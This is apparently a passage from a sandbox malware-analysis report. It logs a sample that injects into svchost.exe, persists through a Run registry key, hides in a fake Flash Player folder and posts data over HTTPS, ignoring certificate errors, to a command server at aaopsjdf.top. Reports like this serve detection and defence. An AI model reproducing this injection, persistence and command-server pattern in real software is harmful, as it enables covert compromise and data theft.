Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close =@ó8, url = aaopsjdf.top/KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q	1	Fn
Send HTTP Request	headers = Connection: close =@ó8, url = aaopsjdf.top/KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Read Response	size = 4096, size_out = 4096	3	Fn Data
Read Response	size = 4096, size_out = 3883	1	Fn Data
Read Response	size = 4096, size_out = 4096	12	Fn Data
Read Response	size = 4096, size_out = 4088	1	Fn Data
Read Response	size = 4096, size_out = 4096	7	Fn Data
Read Response	size = 4096, size_out = 4087	1	Fn Data
Read Response	size = 4096, size_out = 4096	16	Fn Data
Read Response	size = 4096, size_out = 3878	1	Fn Data
Read Response	size = 4096, size_out = 0	1	Fn
Close Session	-	8	Fn

HTTP Session #10

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.71 KB (728 bytes)
Data Received	0.00 KB (4 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /up9k/r3ZwOs/ZMTfab1M/Db/0/TDZH/g, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close ° 5, url = aaopsjdf.top/up9k/r3ZwOs/ZMTfab1M/Db/0/TDZH/g	1	Fn
Send HTTP Request	headers = Connection: close ° 5, url = aaopsjdf.top/up9k/r3ZwOs/ZMTfab1M/Db/0/TDZH/g	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Close Session	-	8	Fn

HTTP Session #11

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.73 KB (746 bytes)
Data Received	0.00 KB (4 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /4Fqm5f1XYW/7kA/4P/IZa/R/cW38/83/21/S3V/Ew, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close @ó8, url = aaopsjdf.top/4Fqm5f1XYW/7kA/4P/IZa/R/cW38/83/21/S3V/Ew	1	Fn
Send HTTP Request	headers = Connection: close @ó8, url = aaopsjdf.top/4Fqm5f1XYW/7kA/4P/IZa/R/cW38/83/21/S3V/Ew	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Close Session	-	8	Fn

HTTP Session #12

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.71 KB (732 bytes)
Data Received	0.00 KB (4 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close @ó8, url = aaopsjdf.top/WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw	1	Fn
Send HTTP Request	headers = Connection: close @ó8, url = aaopsjdf.top/WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Close Session	-	8	Fn

HTTP Session #13

Information	Value
User Agent	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Server Name	aaopsjdf.top
Server Port	443
Data Sent	0.71 KB (730 bytes)
Data Received	0.00 KB (4 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Open Connection	protocol = HTTP, server_name = aaopsjdf.top, server_port = 443	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, target_resource = /wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Send HTTP Request	headers = Connection: close H, url = aaopsjdf.top/wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA	1	Fn
Send HTTP Request	headers = Connection: close H, url = aaopsjdf.top/wJzm/rUw/zPMR2D/vC/Z/7/oPd/0wqaGA	1	Fn Data
Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Close Session	-	8	Fn

Process #17: svchost.exe

(Host: 690, Network: 0)

Information	Value
ID	#17
File Name	c:\windows\syswow64\svchost.exe
Command Line	C:\Windows\SysWOW64\svchost.exe -k netsvcs
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:05:12, Reason: Child Process
Unmonitor	End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration	00:05:01

OS Process Information

Information	Value
PID	0x7f8
Parent PID	0x6a4 (c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Groups	YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f83e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 7E4 0x 350 0x 114 0x 614 0x 718 0x 59C 0x 60C 0x 4F8 0x 460

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
imm32.dll	0x00020000	0x0003dfff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000030000	0x00030000	0x00031fff	Pagefile Backed Memory	Readable, Writable	Region Actions
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000060000	0x00060000	0x00060fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000070000	0x00070000	0x0008bfff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x0000000000090000	0x00090000	0x000cffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000090000	0x00090000	0x00090fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000090000	0x00090000	0x0009bfff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000090000	0x00090000	0x000bffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000d0000	0x000d0000	0x000d0fff	Private Memory	Readable, Writable	Region Actions
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000110000	0x00110000	0x0014ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000170000	0x00170000	0x001effff	Private Memory	Readable, Writable	Region Actions
private_0x00000000001f0000	0x001f0000	0x0022ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000260000	0x00260000	0x0029ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000002c0000	0x002c0000	0x003bffff	Private Memory	Readable, Writable	Region Actions
locale.nls	0x003c0000	0x00426fff	Memory Mapped File	Readable	Region Actions
private_0x0000000000430000	0x00430000	0x004affff	Private Memory	Readable, Writable	Region Actions
rsaenh.dll	0x004b0000	0x004ebfff	Memory Mapped File	Readable	Region Actions
private_0x00000000004f0000	0x004f0000	0x0052ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000000550000	0x00550000	0x0055ffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x0000000000560000	0x00560000	0x006e7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000006f0000	0x006f0000	0x00870fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000910000	0x00910000	0x0094ffff	Private Memory	Readable, Writable	Region Actions
svchost.exe	0x00960000	0x00967fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000970000	0x00970000	0x01d6ffff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000001d70000	0x01d70000	0x02162fff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x02170000	0x0243efff	Memory Mapped File	Readable	Region Actions
private_0x0000000002450000	0x02450000	0x0248ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000024c0000	0x024c0000	0x024fffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002510000	0x02510000	0x0254ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002550000	0x02550000	0x0258ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000025d0000	0x025d0000	0x0260ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002650000	0x02650000	0x0268ffff	Private Memory	Readable, Writable	Region Actions
private_0x00000000026f0000	0x026f0000	0x0272ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002770000	0x02770000	0x027affff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002810000	0x02810000	0x0284ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002850000	0x02850000	0x0288ffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002890000	0x02890000	0x028cffff	Private Memory	Readable, Writable	Region Actions
private_0x0000000002930000	0x02930000	0x0296ffff	Private Memory	Readable, Writable	Region Actions
wow64cpu.dll	0x743d0000	0x743d7fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64win.dll	0x743e0000	0x7443bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x74440000	0x7447efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x75630000	0x7566afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x75670000	0x75685fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
secur32.dll	0x75690000	0x75697fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75800000	0x7580bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x75810000	0x7586ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x758c0000	0x759bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759c0000	0x75acffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x75ad0000	0x75ad4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75ae0000	0x75c3bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x75c40000	0x75e3afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75e70000	0x75f1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x75f20000	0x76014fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x760b0000	0x7610ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76110000	0x761acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x761b0000	0x7623efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x76240000	0x7635cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x76360000	0x7636bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x76370000	0x763c6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76570000	0x7663bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x76640000	0x76685fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76690000	0x767c5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x767d0000	0x767e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76800000	0x768effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x768f0000	0x768f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76950000	0x769dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x76a70000	0x776b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x77740000	0x777dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000778b0000	0x778b0000	0x779a9fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x00000000779b0000	0x779b0000	0x77acefff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77ad0000	0x77c78fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77cb0000	0x77e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007ef9e000	0x7ef9e000	0x7efa0fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa1000	0x7efa1000	0x7efa3fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa4000	0x7efa4000	0x7efa6fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa7000	0x7efa7000	0x7efa9fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Injection Information

Injection Type	Source Process	Source Os Thread ID	Injection Info	Count	Logfile
Modify Memory	#15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x6a8	address = 0x70000, size = 114688	1	Fn Data
Modify Memory	#15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x6a8	address = 0x876c4, size = 4	1	Fn Data
Modify Memory	#15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x6a8	address = 0x877d0, size = 4	1	Fn Data
Modify Memory	#15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x6a8	address = 0x87d38, size = 4	1	Fn Data
Create Remote Thread	#15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x6a8	address = 0x795bc	1	Fn

Host Behavior

File (8)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Temp\azuqkihi	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Local\Temp\xekeov	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	type = size, size_out = 1776	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	type = size, size_out = 196608	1	Fn
Read	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	size = 1776, size_out = 1776	1	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	size = 196608, size_out = 196608	1	Fn Data

Registry (25)

Operation	Key	Additional Information	Count	Logfile
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Create Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Create Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	1	Fn
Open Key	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	-	5	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	2	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, type = REG_BINARY	6	Fn Data
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Omegovna, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Eteg, type = REG_NONE	1	Fn
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	1	Fn Data
Write Value	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci	value_name = Baywkivyl, size = 1776, type = REG_BINARY	1	Fn Data
Write Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Run	value_name = roottools.exe, data = "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe", size = 226, type = REG_SZ	1	Fn

Process (250)

Operation	Process	Additional Information	Count	Logfile
Open	System	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\program files\uninstall information\devon stickers.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\windows\system32\userinit.exe	desired_access = PROCESS_QUERY_INFORMATION	6	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_QUERY_INFORMATION	7	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\program files\microsoft office\root\office16\onenotem.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\windows\syswow64\svchost.exe	desired_access = PROCESS_QUERY_INFORMATION	14	Fn
Open	c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe	desired_access = PROCESS_QUERY_INFORMATION	10	Fn
Open	c:\windows\system32\wbem\wmiprvse.exe	desired_access = PROCESS_QUERY_INFORMATION	3	Fn

Module (228)

Operation	Module	Additional Information	Count	Logfile
Load	KERNEL32.dll	base_address = 0x759c0000	1	Fn
Load	USER32.dll	base_address = 0x758c0000	1	Fn
Load	CRYPT32.dll	base_address = 0x76240000	1	Fn
Load	ADVAPI32.dll	base_address = 0x77740000	1	Fn
Load	SHELL32.dll	base_address = 0x76a70000	1	Fn
Load	SHLWAPI.dll	base_address = 0x76370000	1	Fn
Load	PSAPI.DLL	base_address = 0x75ad0000	1	Fn
Load	ole32.dll	base_address = 0x75ae0000	1	Fn
Load	GDI32.dll	base_address = 0x76950000	1	Fn
Load	WININET.dll	base_address = 0x75f20000	1	Fn
Load	urlmon.dll	base_address = 0x76690000	1	Fn
Load	OLEAUT32.dll	base_address = 0x761b0000	1	Fn
Load	Secur32.dll	base_address = 0x75690000	1	Fn
Get Handle	c:\windows\syswow64\ntdll.dll	base_address = 0x77cb0000	1	Fn
Get Filename	-	process_name = c:\windows\syswow64\svchost.exe, file_name_orig = C:\Windows\SysWOW64\svchost.exe, size = 260	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateThread, address_out = 0x759d7a2f	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x759d49d7	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x759d89b3	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapReAlloc, address_out = 0x77cf1f6e	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetNativeSystemInfo, address_out = 0x759e10b5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateThread, address_out = 0x759d34d5	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapAlloc, address_out = 0x77cde026	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapDestroy, address_out = 0x759d35b7	1	Fn
